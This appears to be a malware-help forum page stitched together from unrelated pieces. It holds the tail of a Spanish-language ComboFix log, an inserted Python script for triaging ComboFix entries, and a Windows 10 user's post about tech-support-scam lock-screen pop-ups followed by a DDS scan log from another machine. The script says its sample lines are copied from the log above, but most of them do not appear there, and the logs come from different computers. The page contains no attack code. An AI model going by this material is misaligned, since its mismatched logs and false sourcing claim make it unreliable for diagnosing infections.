2014-05-01 14:13 470016 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2016-11-10 01:31 1031520 ----a-w- c:\program files\AVAST Software\Avast\ashShA64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1MediaFireIconError]
@="{5EE8C634-CDC0-453D-9731-DF0B19F4E807}"
[HKEY_CLASSES_ROOT\CLSID\{5EE8C634-CDC0-453D-9731-DF0B19F4E807}]
2015-04-23 13:10 89600 ----a-w- c:\program files (x86)\MediaFire Desktop\MediaFireIcon3_c1e50.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1MediaFireIconReadOnly]
@="{7995D0FC-769B-4197-AEC0-991921CB99E1}"
[HKEY_CLASSES_ROOT\CLSID\{7995D0FC-769B-4197-AEC0-991921CB99E1}]
2015-04-23 13:10 89088 ----a-w- c:\program files (x86)\MediaFire Desktop\MediaFireIcon5_c1e50.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1MediaFireIconSynched]
@="{9A3B79CB-D899-40B5-8DBC-20447F1ADC8F}"
[HKEY_CLASSES_ROOT\CLSID\{9A3B79CB-D899-40B5-8DBC-20447F1ADC8F}]
2015-04-23 13:10 84992 ----a-w- c:\program files (x86)\MediaFire Desktop\MediaFireIcon_c1e50.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1MediaFireIconSyncing]
@="{C4D81971-6B13-4173-AB21-F83AD20CCC04}"
[HKEY_CLASSES_ROOT\CLSID\{C4D81971-6B13-4173-AB21-F83AD20CCC04}]
2015-04-23 13:10 86528 ----a-w- c:\program files (x86)\MediaFire Desktop\MediaFireIcon2_c1e50.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\MediaFireIconLock]
@="{759F3E92-F4E8-4953-8315-238B8B17E0F3}"
[HKEY_CLASSES_ROOT\CLSID\{759F3E92-F4E8-4953-8315-238B8B17E0F3}]
2015-04-23 13:10 84992 ----a-w- c:\program files (x86)\MediaFire Desktop\MediaFireIcon4_c1e50.dll
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
UxTuneUp
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mStart Page = https://www.google.com/?trackid=sp-006
mLocal Page = c:\windows\SysWOW64\blank.htm
mSearch Page = https://www.google.com/search?trackid=sp-006&q={searchTerms}
mSearch Bar = https://www.google.com/?trackid=sp-006
uInternet Settings,ProxyOverride = *.local
IE: E&xportar a Microsoft Excel - c:\progra~2\MICROS~3\Office12\EXCEL.EXE/3000
Trusted Zone: eac-cdn.com\download
TCP: DhcpNameServer = 10.206.133.89 8.8.8.8
FF - ProfilePath - c:\users\Usuario\AppData\Roaming\Mozilla\Firefox\Profiles\s4ofnc2w.default-1478814350888\
.
- - - - ORPHANS REMOVED - - - -
.
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
AddRemove-AVG PC TuneUp - c:\program files (x86)\AVG\AVG PC TuneUp\..\Setup\avgsetupx.exe
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\X6va029]
"ImagePath"="\??\c:\windows\SysWOW64\Drivers\X6va029"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks]
"SymbolicLinkValue"=hex(6):5c,00,52,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
00,5c,00,4d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files\AVAST Software\Avast\AvastSvc.exe
c:\program files (x86)\Smadav\SMc:\windows\jmesoft\Service.exe
c:\program files (x86)\Malwarebytes Anti-Malware\mbam.exe
c:\program files (x86)\Lenovo\YouCam\YCMMirage.exe
.
**************************************************************************
.
Completion time: 2016-11-11 21:03:58 - machine was rebooted
ComboFix-quarantined-files.txt 2016-11-12 03:03
.
Pre-Run: 184,567,595,008 bytes libres
Post-Run: 184,226,881,536 bytes libres
.
- - End Of File - - 7CBA2A9E6D4060F20807B7F6BEDBB3CE
A36C5E4F47E84449FF07ED3517B43A31
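As an added example, not part of the original post or of ComboFix itself: a small Python triage pass over ComboFix-style "Files Created" lines, the kind of first look a forum helper gives a log like the one above before asking for more. The rules (hidden items under AppData, anything under Temp, executables or scripts in a user profile) are assumptions about what merits a closer look, not verdicts; the sample lines are copied from the log above, except the example.sys line, which is constructed.

```python
import re

# ComboFix "Files Created" line layout, as seen in the log above:
#   <created> . <modified> <size or -------- for a directory> <attrs> <path>
# attrs is an 8-character field such as "d--h--w-" (d = directory, h = hidden)
# or "----a-w-" (a = archive).
LINE_RE = re.compile(
    r"^(?P<created>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) \. "
    r"(?P<modified>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) "
    r"(?P<size>\d+|-{8}) "
    r"(?P<attrs>[a-z-]{8}) "
    r"(?P<path>.+?)\s*$"
)

# Extensions that should rarely be sitting in a user profile (assumption: the
# Houdini-style VBS/cmd droppers discussed in the thread live in exactly these).
EXEC_EXTS = (".exe", ".sys", ".dll", ".vbs", ".js", ".cmd", ".bat")


def parse_line(line):
    """Return a dict for a well-formed ComboFix line, or None if it is garbled
    (e.g. the 'd-----w-Smad-Lock ...' line in the log, where a field ran into the next)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["is_dir"] = entry["attrs"][0] == "d"
    entry["hidden"] = "h" in entry["attrs"]
    return entry


def triage_reasons(entry):
    """Heuristic reasons a helper would look at this entry first."""
    p = entry["path"].lower()
    reasons = []
    if entry["hidden"] and "\\appdata\\" in p:
        reasons.append("hidden item under AppData")
    if re.search(r"\\temp(\\|$)", p):
        reasons.append("created under a Temp directory")
    if p.startswith("c:\\users\\") and p.endswith(EXEC_EXTS):
        reasons.append("executable or script in a user profile")
    return reasons


def triage(lines):
    """Split log lines into (flagged, unparsed).

    flagged  -> list of (path, [reasons]) in log order
    unparsed -> raw lines the regex could not read; these still need a human eye,
                silently dropping them would hide exactly the garbled entries."""
    flagged, unparsed = [], []
    for line in lines:
        if not line.strip():
            continue
        entry = parse_line(line)
        if entry is None:
            unparsed.append(line.strip())
            continue
        reasons = triage_reasons(entry)
        if reasons:
            flagged.append((entry["path"], reasons))
    return flagged, unparsed


# Sample input: lines copied from the ComboFix log above, plus one constructed
# line (example.sys) so the user-profile rule is exercised.
SAMPLE = r"""
2016-11-12 02:40 . 2016-11-12 02:40 -------- d-----w- c:\users\Default\AppData\Local\temp
2016-11-11 21:24 . 2016-11-11 21:24 28272 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2016-11-10 06:10 . 2016-11-10 06:10 -------- d-----w-Smad-Lock (Brankas Smadav) ? C:\SMAD-L~1
2016-11-09 04:35 . 2016-11-09 04:35 -------- d-----w- c:\program files\7-Zip
2016-10-31 06:21 . 2016-11-10 01:24 -------- d--h--w- c:\users\Usuario\AppData\Roaming\jieio
2016-11-10 05:00 . 2016-11-10 05:00 12345 ----a-w- c:\users\Usuario\AppData\Local\Temp\example.sys
""".strip().splitlines()


if __name__ == "__main__":
    flagged_entries, unparsed_lines = triage(SAMPLE)
    for path, why in flagged_entries:
        print(f"LOOK: {path}  <- {'; '.join(why)}")
    for raw in unparsed_lines:
        print(f"UNPARSED (garbled line, check by hand): {raw}")
```

A hit here only means "ask about this entry next"; the hidden jieio directory under Roaming, for instance, is the kind of thing a helper would want the poster to identify before deciding anything.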

Help with removing malware?

I have Windows 10 and for the last few days I have been getting these pop-ups blocking my computer or freezing it. It seems to have started when I answered a Woolworths post, at least I think so.
It says "your computer is blocked, please ring this number to unblock it" and I can't click it off, so I go to Control, Alt and Delete and then click Google and off it goes. Now I have removed Google Chrome and gone back to Explorer and it's still doing it, so please can you give me any help.
I will paste the two you asked to have done in your forum. Please, any help with this problem. Thanking you, Lorraine Beard.

Windows 10 Pro
HP 32-bit op system
Avast Premier antivirus


DDS

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 11.0.10586.672
Run by Lorraine at 15:37:48 on 2016-11-13
Microsoft Windows 10 Pro 10.0.10586.0.1252.61.2057.18.3543.1639 [GMT 11:00]
.
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Avast Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Avast Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: Avast Antivirus *Enabled* {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
.
============== Running Processes ================
.
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\WINDOWS\System32\spoolsv.exe
C:\Program Files\AVAST Software\Avast\afwServ.exe
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\Program Files\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
C:\Program Files\HP\Shared\hpqwmiex.exe
C:\WINDOWS\System32\dwm.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Windows\System32\RuntimeBroker.exe
C:\WINDOWS\Explorer.EXE
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\CCleaner\CCleaner.exe
C:\WINDOWS\System32\fontdrvhost.exe
C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x86__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Program Files\WindowsApps\Microsoft.BingWeather_4.16.15.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe
C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
C:\WINDOWS\system32\browser_broker.exe
C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\microsoftedgecp.exe
C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\microsoftedgecp.exe
C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\conhost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.live.com/
uLocal Page = %11%\blank.htm
uSearch Bar = hxxp://g.ninemsn.com.au/0SEENAU/SAOS01?FORM=TOOLBR
uSearch Page = hxxp://g.ninemsn.com.au/0SEENAU/SAOS01?FORM=TOOLBR
BHO: Windows Live Toolbar Helper: {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\program files\windows live toolbar\msntb.dll
BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - c:\program files\hewlett-packard\hp support framework\resources\hpnetworkcheck\HPNetworkCheckPlugin.dll
TB: Windows Live Toolbar: {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\program files\windows live toolbar\msntb.dll
TB: Windows Live Toolbar: {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\program files\windows live toolbar\msntb.dll
uRun: [OneDrive] "c:\users\lorraine\appdata\local\microsoft\onedrive\OneDrive.exe" /background
uRun: [Skype] "c:\program files\skype\phone\Skype.exe" /minimized /regrun
uRun: [CCleaner Monitoring] "c:\program files\ccleaner\CCleaner.exe" /MONITOR
mRun: [AvastUI.exe] "c:\program files\avast software\avast\AvastUI.exe" /nogui
mRun: [HP Software Update] c:\program files\hp\hp software update\HPWuSchd2.exe
StartupFolder: c:\users\lorraine\appdata\roaming\micros~1\windows\startm~1\programs\startup\sendto~1.lnk - c:\program files\microsoft office\root\office16\ONENOTEM.EXE
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: SoftwareSASGeneration = dword:1
IE: &Windows Live Search - c:\program files\windows live toolbar\msntb.dll/search.htm
IE: E&xport to Microsoft Excel - c:\program files\microsoft office\root\office16\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\program files\microsoft office\root\office16\ONBttnIE.dll/105
IE: {22CC3EBD-C286-43aa-B8E6-06B115F74162} - c:\program files\hewlett-packard\smart print\SmartPrintSetup.exe
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - c:\program files\hewlett-packard\hp support framework\resources\hpnetworkcheck\NCLauncherFromIE.exe
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office\root\office16\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - c:\program files\microsoft office\root\office16\ONBttnIELinkedNotes.dll
TCP: NameServer = 10.0.0.138
TCP: Interfaces\{301607f6-596d-48b8-997e-59ddfaedcd4f} : DHCPNameServer = 10.0.0.138
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - c:\program files\microsoft office\root\office16\MSOSB.DLL
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - c:\program files\microsoft office\root\office16\MSOSB.DLL
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - c:\program files\microsoft office\root\office16\MSOSB.DLL
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - c:\program files\microsoft office\root\office16\MSOSB.DLL
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - c:\windows\system32\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - c:\windows\system32\tbauth.dll
SSODL: WebCheck - <orphaned>
LSA: Security Packages = ""
mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - c:\windows\system32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\lorraine\appdata\roaming\mozilla\firefox\profiles\ji9m222t.default\
FF - prefs.js: browser.search.defaulturl - hxxps://search.avast.com/AV772/search/web?q={searchTerms}
FF - prefs.js: browser.search.selectedEngine - Avast Search
FF - prefs.js: browser.startup.homepage - hxxps://www.google.com.au/
FF - prefs.js: keyword.URL - hxxps://search.avast.com/AV772/search/web?q={searchTerms}
FF - plugin: c:\program files\google\update\1.3.31.5\npGoogleUpdate3.dll
FF - plugin: c:\program files\microsoft office\root\office16\NPSPWRAP.DLL
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_23_0_0_207.dll
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;avast! Revert;c:\windows\system32\drivers\aswRvrt.sys [2016-6-13 60424]
R0 aswVmm;avast! VM Monitor;c:\windows\system32\drivers\aswVmm.sys [2016-6-13 224752]
R0 SCMNdisP;General NDIS Protocol Driver;c:\windows\system32\drivers\SCMNdisP.sys [2016-6-14 21728]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;c:\windows\system32\drivers\WindowsTrustedRT.sys [2015-10-30 86552]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;c:\windows\system32\drivers\WindowsTrustedRTProxy.sys [2015-10-30 15384]
R0 Wof;Windows Overlay File System Filter Driver;c:\windows\system32\drivers\wof.sys [2015-10-30 173408]
R1 ahcache;Application Compatibility Cache;c:\windows\system32\drivers\ahcache.sys [2016-9-15 183296]
R1 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys [2016-6-13 35096]
R1 aswNetSec;aswNetSec;c:\windows\system32\drivers\aswNetSec.sys [2016-6-13 338936]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2016-6-13 735488]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2016-6-13 433768]
R1 FileCrypt;FileCrypt;c:\windows\system32\drivers\filecrypt.sys [2016-5-11 76288]
R1 GpuEnergyDrv;GPU Energy Driver;c:\windows\system32\drivers\gpuenergydrv.sys [2015-10-30 7680]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2016-6-13 92256]
R2 aswStm;aswStm;c:\windows\system32\drivers\aswStm.sys [2016-6-13 118664]
R2 avast! Antivirus;Avast Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2016-9-1 197128]
R2 avast! Firewall;Avast Firewall;c:\program files\avast software\avast\afwServ.exe [2016-9-1 223600]
R2 ClickToRunSvc;Microsoft Office Click-to-Run Service;c:\program files\common files\microsoft shared\clicktorun\OfficeClickToRun.exe [2016-6-13 2288320]
R2 CoreMessagingRegistrar;CoreMessaging;c:\windows\system32\svchost.exe -k LocalServiceNoNetwork [2015-10-30 37256]
R2 DiagTrack;Connected User Experiences and Telemetry;c:\windows\system32\svchost.exe -k utcsvc [2015-10-30 37256]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;c:\program files\hewlett-packard\hp support solutions\HPSupportSolutionsFrameworkService.exe [2016-7-4 29728]
R2 storqosflt;Storage QoS Filter Driver;c:\windows\system32\drivers\storqosflt.sys [2015-10-30 62464]
R2 tiledatamodelsvc;Tile Data model server;c:\windows\system32\svchost.exe -k appmodel [2015-10-30 37256]
R2 UserManager;User Manager;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
R3 ClipSVC;Client License Service (ClipSVC);c:\windows\system32\svchost.exe -k wsappx [2015-10-30 37256]
R3 DsSvc;Data Sharing Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
R3 hpqcaslwmiex;HP CASL Framework Service;c:\program files\hp\shared\hpqwmiex.exe [2016-6-3 1031704]
R3 lfsvc;Geolocation Service;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
R3 LicenseManager;Windows License Manager Service;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys [2016-9-1 170200]
R3 NcbService;Network Connection Broker;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;c:\windows\system32\drivers\NdisVirtualBus.sys [2015-10-30 15872]
R3 StateRepository;State Repository Service;c:\windows\system32\svchost.exe -k appmodel [2015-10-30 37256]
S2 DoSvc;Delivery Optimization;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S2 MapsBroker;Downloaded Maps Manager;c:\windows\system32\svchost.exe -k NetworkService [2015-10-30 37256]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2016-9-20 324224]
S2 WSWNA3100;WSWNA3100;c:\program files\netgear\wna3100\WifiSvc.exe [2016-6-14 285152]
S3 ADP80XX;ADP80XX;c:\windows\system32\drivers\adp80xx.sys [2015-10-30 1038176]
S3 AJRouter;AllJoyn Router Service;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
S3 AppReadiness;App Readiness;c:\windows\system32\svchost.exe -k AppReadiness [2015-10-30 37256]
S3 AppXSvc;AppX Deployment Service (AppXSVC);c:\windows\system32\svchost.exe -k wsappx [2015-10-30 37256]
S3 aswHwid;avast! HardwareID;c:\windows\system32\drivers\aswHwid.sys [2016-6-13 34008]
S3 bcmfn;bcmfn Service;c:\windows\system32\drivers\bcmfn.sys [2015-10-30 8192]
S3 bcmfn2;bcmfn2 Service;c:\windows\system32\drivers\bcmfn2.sys [2015-10-30 8192]
S3 BthHFSrv;Bluetooth Handsfree Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2015-10-30 37256]
S3 buttonconverter;Service for Portable Device Control devices;c:\windows\system32\drivers\buttonconverter.sys [2015-10-30 26624]
S3 CapImg;HID driver for CapImg touch screen;c:\windows\system32\drivers\capimg.sys [2016-2-24 96768]
S3 DcpSvc;DataCollectionPublishingService;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 DevQueryBroker;DevQuery Background Discovery Broker;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;c:\windows\system32\diagsvcs\DiagnosticsHub.StandardCollector.Service.exe [2015-10-30 26112]
S3 DmEnrollmentSvc;Device Management Enrollment Service;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 dmwappushservice;dmwappushsvc;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 embeddedmode;embeddedmode;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 EntAppSvc;Enterprise App Management Service;c:\windows\system32\svchost.exe -k appmodel [2015-10-30 37256]
S3 fcvsc;fcvsc;c:\windows\system32\drivers\fcvsc.sys [2015-10-30 24064]
S3 genericusbfn;Generic USB Function Class;c:\windows\system32\drivers\genericusbfn.sys [2016-11-9 17408]
S3 GPIO;Intel SoC GPIO Controller Driver;c:\windows\system32\drivers\iaiogpio.sys [2015-10-30 22016]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;c:\windows\system32\drivers\hidinterrupt.sys [2015-10-30 38240]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;c:\windows\system32\drivers\iai2c.sys [2015-10-30 66048]
S3 iaioi2c;Intel(R) Atom(TM) Processor I2C Controller Service;c:\windows\system32\drivers\iaioi2c.sys [2015-10-30 61936]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;c:\windows\system32\drivers\iaStorAV.sys [2015-10-30 524632]
S3 icssvc;Windows Mobile Hotspot Service;c:\windows\system32\svchost.exe -k LocalServiceNetworkRestricted [2015-10-30 37256]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2015-10-30 107008]
S3 intelpep;Intel(R) Power Engine Plug-in Driver;c:\windows\system32\drivers\intelpep.sys [2015-10-30 40288]
S3 IoQos;IoQos;c:\windows\system32\drivers\ioqos.sys [2015-10-30 23040]
S3 LSI_SAS2i;LSI_SAS2i;c:\windows\system32\drivers\lsi_sas2i.sys [2015-10-30 88928]
S3 LSI_SAS3i;LSI_SAS3i;c:\windows\system32\drivers\lsi_sas3i.sys [2015-10-30 83288]
S3 NetSetupSvc;Network Setup Service;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 NgcCtnrSvc;Microsoft Passport Container;c:\windows\system32\svchost.exe -k LocalServiceNetworkRestricted [2015-10-30 37256]
S3 NgcSvc;Microsoft Passport;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 percsas2i;percsas2i;c:\windows\system32\drivers\percsas2i.sys [2015-10-30 51040]
S3 percsas3i;percsas3i;c:\windows\system32\drivers\percsas3i.sys [2015-10-30 51552]
S3 PhoneSvc;Phone Service;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
S3 RetailDemo;Retail Demo Service;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 SensorDataService;Sensor Data Service;c:\windows\system32\SensorDataService.exe [2016-9-15 900096]
S3 SensorService;Sensor Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 SerCx2;Serial UART Support Library;c:\windows\system32\drivers\SerCx2.sys [2015-10-30 121696]
S3 smphost;Microsoft Storage Spaces SMP;c:\windows\system32\svchost.exe -k smphost [2015-10-30 37256]
S3 SmsRouter;Microsoft Windows SMS Router Service.;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 stornvme;Microsoft Standard NVM Express Driver;c:\windows\system32\drivers\stornvme.sys [2015-10-30 65376]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;c:\windows\system32\drivers\storufs.sys [2015-10-30 27992]
S3 TieringEngineService;Storage Tiers Management;c:\windows\system32\TieringEngineService.exe [2015-10-30 256512]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;c:\windows\system32\drivers\UcmCx.sys [2016-5-11 46080]
S3 UcmUcsi;USB Connector Manager UCSI Client;c:\windows\system32\drivers\UcmUcsi.sys [2015-10-30 33792]
S3 UdeCx;USB Device Emulation Support Library;c:\windows\system32\drivers\Udecx.sys [2015-10-30 32768]
S3 UEFI;Microsoft UEFI Driver;c:\windows\system32\drivers\uefi.sys [2015-10-30 23392]
S3 Ufx01000;USB Function Class Extension;c:\windows\system32\drivers\ufx01000.sys [2016-6-15 203104]
S3 UfxChipidea;USB Chipidea Controller;c:\windows\system32\drivers\UfxChipidea.sys [2015-10-30 74080]
S3 ufxsynopsys;USB Synopsys Controller;c:\windows\system32\drivers\ufxsynopsys.sys [2016-9-15 104800]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;c:\windows\system32\drivers\urschipidea.sys [2015-10-30 21856]
S3 UrsCx01000;USB Role-Switch Support Library;c:\windows\system32\drivers\urscx01000.sys [2015-10-30 42840]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;c:\windows\system32\drivers\urssynopsys.sys [2015-10-30 21856]
S3 UsoSvc;Update Orchestrator Service;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 vhf;Virtual HID Framework (VHF) Driver;c:\windows\system32\drivers\vhf.sys [2015-10-30 24064]
S3 vmicguestinterface;Hyper-V Guest Service Interface;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 vmicvmsession;Hyper-V VM Session Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 WalletService;WalletService;c:\windows\system32\svchost.exe -k appmodel [2015-10-30 37256]
S3 wdiwifi;WDI Driver Framework;c:\windows\system32\drivers\WdiWiFi.sys [2016-4-13 497152]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;c:\windows\system32\drivers\WdNisDrv.sys [2015-10-30 98648]
S3 WdNisSvc;Windows Defender Network Inspection Service;c:\program files\windows defender\NisSrv.exe [2015-10-30 280376]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;c:\windows\system32\svchost.exe -k WepHostSvcGroup [2015-10-30 37256]
S3 workfolderssvc;Work Folders;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
S3 WpnService;Windows Push Notifications Service;c:\windows\system32\svchost.exe -k wswpnservice [2015-10-30 37256]
S3 XblAuthManager;Xbox Live Auth Manager;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 XblGameSave;Xbox Live Game Save;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 xboxgip;Xbox Game Input Protocol Driver;c:\windows\system32\drivers\xboxgip.sys [2016-3-2 201216]
S3 XboxNetApiSvc;XboxNetApiSvc;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 xinputhid;XINPUT HID Filter Driver;c:\windows\system32\drivers\xinputhid.sys [2016-4-13 18944]
S4 CDPSvc;Connected Device Platform Service;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
